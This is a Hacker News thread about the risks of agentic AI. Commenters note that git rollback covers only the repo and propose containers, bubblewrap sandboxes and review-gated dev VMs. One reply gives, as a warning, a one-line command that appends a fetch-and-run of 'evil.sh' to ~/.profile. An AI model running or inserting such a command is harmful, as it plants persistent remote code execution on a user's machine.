
645 points helloplanets | 2 comments
_fat_santa ◴[] No.45005348[source]
IMO the only place you should use agentic AI is where you can easily roll back the changes it makes. The best example is asking AI to build/update/debug some code: you can ask it to make changes, and they're relatively safe because you can easily roll them back with git.
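
A rough sketch of that checkpoint-and-rollback flow, with a placeholder tag name:

    # checkpoint before letting the agent loose (tag name is just an example)
    git add -A && git commit -m "checkpoint before agent run"
    git tag agent-checkpoint

    # ... agent makes its changes ...

    # unhappy with the result: drop everything it touched inside the repo
    git reset --hard agent-checkpoint && git clean -fd

Note this only covers files inside the working tree.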

Using agentic AI for web browsing, where you can't easily roll back an action, is just wild to me.

replies(5): >>45005645 #>>45005694 #>>45005757 #>>45006070 #>>45008315 #
gruez ◴[] No.45005757[source]
>The best example is asking AI to build/update/debug some code: you can ask it to make changes, and they're relatively safe because you can easily roll them back with git.

Only if the rollback is done at the VM/container level; otherwise the agent can end up running arbitrary code that modifies files or configuration outside the repo, unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
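
One way to actually get that VM/container-level rollback is to run the whole agent session in a throwaway container, so a write outside the mounted project directory (like that ~/.profile edit, which would otherwise download and run a script on every future login) disappears when the container exits. A rough sketch; the image and command names here are made up:

    # --rm: the container's filesystem is discarded on exit
    # only the mounted project directory persists
    docker run --rm -it \
        -v "$PWD":/workspace -w /workspace \
        some-agent-image agent-cli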
replies(2): >>45006001 #>>45006067 #
1. avalys ◴[] No.45006001[source]
The agents can be sandboxed or at least chroot’d to the project directory, right?
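
Something like bubblewrap would be the concrete version of that: bind the whole filesystem read-only and leave only the project directory writable. A sketch, with a made-up agent command:

    # everything read-only except the current project directory
    bwrap --ro-bind / / \
          --dev /dev --proc /proc \
          --tmpfs /tmp \
          --bind "$PWD" "$PWD" \
          agent-cli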
replies(1): >>45006141 #
2. gruez ◴[] No.45006141[source]
1. AFAIK most AI coding agents don't do this

2. Even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all of its output, it can easily plant malicious code that gets executed the moment you try to run it. The only safe way of doing this is a dedicated AI development VM where you do all the prompting and testing, only very limited credentials are present (in case it gets compromised), and changes only leave the VM after a thorough inspection (e.g. a PR process).
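
A rough sketch of that last setup, with placeholder branch names, and assuming the VM's credentials can only push branches rather than merge them:

    # inside the disposable dev VM: the agent only ever works on a branch
    git checkout -b agent/feature-x
    # ... prompting, edits, tests happen here ...
    git push origin agent/feature-x

    # outside the VM: a human reviews the full diff before anything is merged or run
    git fetch origin
    git diff main...origin/agent/feature-x
    # merge only through a reviewed PR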